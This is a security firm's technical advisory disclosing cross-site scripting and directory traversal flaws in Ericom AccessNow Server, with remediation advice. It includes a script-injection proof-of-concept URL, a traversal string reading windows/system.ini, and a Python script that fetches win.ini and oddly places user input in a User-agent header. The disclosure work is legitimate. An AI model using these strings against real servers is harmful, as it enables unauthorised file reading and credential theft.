Commissum

Commissum Technical Advisory – Ericom AccessNow Server Weaknesses



 Ericom AccessNow Server 2.x Multiple Vulnerabilities

 Introduction

This document is a technical advisory for weaknesses found in Ericom AccessNow Server. This document is being released in order to alert Ericom customers to the risks detailed below and to request remediation. Please note that this document may be subject to modification as new information becomes available.

Summary

Commissum Senior Consultant Liam Romanis identified a number of vulnerabilities in Ericom AccessNow Server version 3.4.0.4031 installed on a client’s site which included:

  • Cross-Site Scripting: An attacker may be able to inject malicious JavaScript with the intention of stealing users’ login credentials or to expedite other attacks such as click-jacking.
  • Directory Traversal: An attacker may be able to retrieve arbitrary files from the host operating system of the Ericom AccessNow Server.
  • With further interaction with the vendor and client we were able to establish that version 2.x (including 2.2 and 2.4) was vulnerable.

 Cross-Site Scripting Proof Of Concept

This proof of concept attack string is provided for the customers to attempt to replicate the issue:

http://<AccessNow_Server_IP>:<port>/AccessNow/”><script>alert(123)</script>.html

This request should result in a message box being displayed containing the text ‘123’.

Directory Traversal

The effective attack string for this issue is:

https://<Ericom_AccessNow_Server_IP>:<port>/AccessNow/../../../../../../../../../../../../windows/system.ini

However, it should be noted that it did not appear possible to exploit this issue using a browser request.

This proof of concept attack script is provided for customers to attempt to replicate the issue:

#!/usr/bin/python

# Liam Romanis 24/03/2015

# http://commissum.org

#

# Directory Traversal in Ericon AccessNow Server version 3.4.0.4031

import sys, urllib2

 

URL=”https://<ip address>:8080/../../../../../../../../../../../../windows/win.ini

print “[+] Attempting test – Once you see ~$ hit return to see contents of file”

 

while True:

command=raw_input(“~$ “)

opener=urllib2.build_opener()

opener.addheaders=[('User-agent', '(); Content-Type: text/plain ;' +command)]

try:

response=opener.open(URL)

for line in response.readlines():

print line.strip()

except Exception as e: print e

 

Remediation

Customers are recommended to upgrade all Ericom AccessNow servers to the latest version (3.5.x).